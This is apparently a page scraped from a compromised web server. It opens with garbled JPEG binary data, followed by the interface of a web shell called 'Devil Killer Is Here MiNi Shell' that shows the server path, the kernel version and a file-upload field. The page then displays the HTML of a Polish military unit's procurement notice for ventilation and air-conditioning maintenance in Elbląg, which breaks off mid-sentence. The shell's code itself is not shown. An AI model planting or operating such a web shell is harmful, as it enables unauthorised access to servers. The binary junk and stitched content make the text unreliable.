JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231102/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231102/0047271701-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> KONSERWACJA I NADZÓR NAD URZĄDZENIAMI WENTYLACJI MECHANICZNEJ I KLIMATYZACJI. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">21 Wojskowy Oddział Gospodarczy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 281385396</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kwiatkowskiego 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Elbląg</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">82-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL621 - Elbląski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">21wog@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://21wog.wp.mil.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> 21 Wojskowy Oddział Gospodarczy </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Obrona</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> KONSERWACJA I NADZÓR NAD URZĄDZENIAMI WENTYLACJI MECHANICZNEJ I KLIMATYZACJI. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e5c73402-74a4-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00472717</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-11-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00127407/19/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.10 KONSERWACJE I NADZÓR NAD URZĄDZENIAMI WENTYLACJI W 2024 R. MECHANICZNEJ I KLIMATYZACJI</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/21wog <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://portal.smartpzp.pl/21wog</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych i informacji przekazywanych przy ich użyciu zostały opisane<br/>w Regulaminie korzystania z usług Systemu (Regulamin Portalu e-Usług) dostępnym z poziomu modułu E-learning dla wszystkich użytkowników Systemu oraz podczas rejestracji konta Wykonawcy dla Wykonawców</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) <br/>(Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>	Administratorem Pani/Pana danych osobowych jest 21 Wojskowy Oddział Gospodarczy w Elblągu, ul. Kwiatkowskiego 15, 82-300 Elbląg, e-mail: 21wog@ron.mil.pl;<br/>	Administrator wyznaczył Inspektora Ochrony Danych, z którym można się kontaktować w sprawach związanych z danymi osobowymi pod adresem e-mail: 21wog@ron.mil.pl;<br/>	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO <br/>w celu związanym z postępowaniem o udzielenie zamówienia publicznego na „Konserwację i nadzór nad urządzeniami wentylacji mechanicznej i klimatyzacji” nr postępowania 65/SZP/2023;<br/>	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania;<br/>	Pani/Pana dane osobowe będą przechowywane przez okres 5 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 5 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane <br/>w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>	posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>	nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest <br/>art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">J.W.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">21WOG-SZP.2712.66.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Konserwacja i nadzór nad urządzeniami wentylacji mechanicznej i klimatyzacji:<br/>Część zamówienia nr 1 – Konserwacja i nadzór nad urządzeniami wentylacji mechanicznej i klimatyzacji w garnizonach Elbląg i Morąg. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50712000-9 - Usługi w zakresie napraw i konserwacji mechanicznych instalacji budynkowych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71315410-6 - Kontrola systemu wentylacji</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-27</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielenia zamówień, o których mowa w art. 214 ust.1 pkt 7 ustawy Pzp, w zakresie do 50% wartości zamówienia podstawowego. Polegać one będą na powtórzeniu podobnych usług z zakresu objętego przedmiotem zamówienia w zakresie do 50% wartości zamówienia podstawowego. Będą udzielone na warunkach ustalonych w zamówieniu podstawowym (warunkach umowy) z uwzględnieniem dodatkowych negocjacji prowadzonych w zakresie realizacji tego zamówienia.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty w części zamówienia nr 1, 2, 3, 4 Zamawiający będzie się kierował następującymi kryteriami:<br/>Cena brutto oferty - 60%<br/>Czas przystąpienia do usunięcia awarii - 40%<br/>2.	W kryterium „Cena brutto oferty” zostanie zastosowany wzór:<br/><br/>najniższa oferowana cena brutto <br/>Liczba punktów = ------------------------------------------- x 100 pkt x 60%<br/>cena brutto oferty badanej<br/>3.	W kryterium „Czas przystąpienia do usunięcia awarii” oferta uzyska:<br/><br/>Czas przystąpienia do usunięcia awarii od chwili zgłoszenia przez Zamawiającego	Liczba punktów<br/>do 1,5 godz. od chwili zgłoszenia awarii przez Zamawiającego	40 pkt<br/>powyżej 1,5 godz. – do 2 godz. od chwili zgłoszenia awarii przez Zamawiającego	30 pkt<br/>powyżej 2 godz. – do 2,5 godz. od chwili zgłoszenia awarii przez Zamawiającego	20 pkt<br/>powyżej 2,5 godz. – do 3 godz. od chwili zgłoszenia awarii przez Zamawiającego	10 pkt<br/>powyżej 3 godz. – do 3,5 godz. od chwili zgłoszenia awarii przez Zamawiającego	0 pkt<br/><br/>UWAGA:<br/>	Maksymalny czas przystąpienia do usunięcia awarii od chwili zgłoszenia przez Zamawiającego wynosi do 3,5 godziny. <br/>	W przypadku zaoferowania przez Wykonawcę czasu przystąpienia do usunięcia awarii od chwili zgłoszenia awarii przez Zamawiającego powyżej 3,5 godzin – spowoduje to odrzucenie oferty, jako niezgodnej z treścią SWZ.<br/>	Brak zaznaczenia przez Wykonawcę w formularzu ofertowym „Czasu przystąpienia do usunięcia awarii” od chwili zgłoszenia przez Zamawiającego oznaczać będzie, że czas przystąpienia do usunięcia awarii od chwili zgłoszenia awarii przez Zamawiającego będzie wynosił powyżej 3 godz. do 3,5 godz. od chwili zgłoszenia awarii przez Zamawiającego, w związku z czym Wykonawca otrzyma 0 pkt.<br/><br/>4.	Liczba punktów uzyskanych przez dana ofertę będzie wyliczana wg. wzoru: <br/>P = K1 + K2 <br/>P - liczba punktów uzyskanych przez daną ofertę;<br/>K1 - liczba punktów uzyskanych przez daną ofertę w kryterium „Cena brutto oferty”;<br/>K2 - liczba punktów uzyskanych przez daną ofertę w kryterium „Czas przystąpienia do usunięcia awarii”.<br/>5.	Oferta będzie podlegać ocenie dla każdej części zamówienia. Punkty będą liczone z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.<br/>6.	Za ofertę najkorzystniejszą zostanie uznana ta oferta spośród złożonych, która uzyska najwyższą liczbę punktów. Maksymalna liczba punktów, jaką może osiągnąć oferta wynosi 100.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas przystąpienia do usunięcia awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Konserwacja i nadzór nad urządzeniami wentylacji mechanicznej i klimatyzacji:<br/>Część zamówienia nr 2 – Konserwacja i nadzór nad urządzeniami wentylacji mechanicznej i klimatyzacji w garnizonach Braniewo i Bartoszyce. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50712000-9 - Usługi w zakresie napraw i konserwacji mechanicznych instalacji budynkowych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71315410-6 - Kontrola systemu wentylacji</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-27</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielenia zamówień, o których mowa w art. 214 ust.1 pkt 7 ustawy Pzp, w zakresie do 50% wartości zamówienia podstawowego. Polegać one będą na powtórzeniu podobnych usług z zakresu objętego przedmiotem zamówienia <br/>w zakresie do 50% wartości zamówienia podstawowego. Będą udzielone na warunkach ustalonych w zamówieniu podstawowym (warunkach umowy) z uwzględnieniem dodatkowych negocjacji prowadzonych w zakresie realizacji tego zamówienia.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty w części zamówienia nr 1, 2, 3, 4 Zamawiający będzie się kierował następującymi kryteriami:<br/>Cena brutto oferty - 60%<br/>Czas przystąpienia do usunięcia awarii - 40%<br/>2.	W kryterium „Cena brutto oferty” zostanie zastosowany wzór:<br/><br/>najniższa oferowana cena brutto <br/>Liczba punktów = ------------------------------------------- x 100 pkt x 60%<br/>cena brutto oferty badanej<br/>3.	W kryterium „Czas przystąpienia do usunięcia awarii” oferta uzyska:<br/><br/>Czas przystąpienia do usunięcia awarii od chwili zgłoszenia przez Zamawiającego	Liczba punktów<br/>do 1,5 godz. od chwili zgłoszenia awarii przez Zamawiającego	40 pkt<br/>powyżej 1,5 godz. – do 2 godz. od chwili zgłoszenia awarii przez Zamawiającego	30 pkt<br/>powyżej 2 godz. – do 2,5 godz. od chwili zgłoszenia awarii przez Zamawiającego	20 pkt<br/>powyżej 2,5 godz. – do 3 godz. od chwili zgłoszenia awarii przez Zamawiającego	10 pkt<br/>powyżej 3 godz. – do 3,5 godz. od chwili zgłoszenia awarii przez Zamawiającego	0 pkt<br/><br/>UWAGA:<br/>	Maksymalny czas przystąpienia do usunięcia awarii od chwili zgłoszenia przez Zamawiającego wynosi do 3,5 godziny. <br/>	W przypadku zaoferowania przez Wykonawcę czasu przystąpienia do usunięcia awarii od chwili zgłoszenia awarii przez Zamawiającego powyżej 3,5 godzin – spowoduje to odrzucenie oferty, jako niezgodnej z treścią SWZ.<br/>	Brak zaznaczenia przez Wykonawcę w formularzu ofertowym „Czasu przystąpienia do usunięcia awarii” od chwili zgłoszenia przez Zamawiającego oznaczać będzie, że czas przystąpienia do usunięcia awarii od chwili zgłoszenia awarii przez Zamawiającego będzie wynosił powyżej 3 godz. do 3,5 godz. od chwili zgłoszenia awarii przez Zamawiającego, w związku z czym Wykonawca otrzyma 0 pkt.<br/><br/>4.	Liczba punktów uzyskanych przez dana ofertę będzie wyliczana wg. wzoru: <br/>P = K1 + K2 <br/>P - liczba punktów uzyskanych przez daną ofertę;<br/>K1 - liczba punktów uzyskanych przez daną ofertę w kryterium „Cena brutto oferty”;<br/>K2 - liczba punktów uzyskanych przez daną ofertę w kryterium „Czas przystąpienia do usunięcia awarii”.<br/>5.	Oferta będzie podlegać ocenie dla każdej części zamówienia. Punkty będą liczone z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.<br/>6.	Za ofertę najkorzystniejszą zostanie uznana ta oferta spośród złożonych, która uzyska najwyższą liczbę punktów. Maksymalna liczba punktów, jaką może osiągnąć oferta wynosi 100.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas przystąpienia do usunięcia awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Konserwacja i nadzór nad urządzeniami wentylacji mechanicznej i klimatyzacji:<br/>Część zamówienia nr 3 – Konserwacja i nadzór nad urządzeniami wentylacji mechanicznej i klimatyzacji w budynku nr 1 w KNW przy ul. Podchorążych w Elblągu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50712000-9 - Usługi w zakresie napraw i konserwacji mechanicznych instalacji budynkowych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71315410-6 - Kontrola systemu wentylacji</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-27</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielenia zamówień, o których mowa w art. 214 ust.1 pkt 7 ustawy Pzp, w zakresie do 50% wartości zamówienia podstawowego. Polegać one będą na powtórzeniu podobnych usług z zakresu objętego przedmiotem zamówienia <br/>w zakresie do 50% wartości zamówienia podstawowego. Będą udzielone na warunkach ustalonych w zamówieniu podstawowym (warunkach umowy) z uwzględnieniem dodatkowych negocjacji prowadzonych w zakresie realizacji tego zamówienia.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty w części zamówienia nr 1, 2, 3, 4 Zamawiający będzie się kierował następującymi kryteriami:<br/>Cena brutto oferty - 60%<br/>Czas przystąpienia do usunięcia awarii - 40%<br/>2.	W kryterium „Cena brutto oferty” zostanie zastosowany wzór:<br/><br/>najniższa oferowana cena brutto <br/>Liczba punktów = ------------------------------------------- x 100 pkt x 60%<br/>cena brutto oferty badanej<br/>3.	W kryterium „Czas przystąpienia do usunięcia awarii” oferta uzyska:<br/><br/>Czas przystąpienia do usunięcia awarii od chwili zgłoszenia przez Zamawiającego	Liczba punktów<br/>do 1,5 godz. od chwili zgłoszenia awarii przez Zamawiającego	40 pkt<br/>powyżej 1,5 godz. – do 2 godz. od chwili zgłoszenia awarii przez Zamawiającego	30 pkt<br/>powyżej 2 godz. – do 2,5 godz. od chwili zgłoszenia awarii przez Zamawiającego	20 pkt<br/>powyżej 2,5 godz. – do 3 godz. od chwili zgłoszenia awarii przez Zamawiającego	10 pkt<br/>powyżej 3 godz. – do 3,5 godz. od chwili zgłoszenia awarii przez Zamawiającego	0 pkt<br/><br/>UWAGA:<br/>	Maksymalny czas przystąpienia do usunięcia awarii od chwili zgłoszenia przez Zamawiającego wynosi do 3,5 godziny. <br/>	W przypadku zaoferowania przez Wykonawcę czasu przystąpienia do usunięcia awarii od chwili zgłoszenia awarii przez Zamawiającego powyżej 3,5 godzin – spowoduje to odrzucenie oferty, 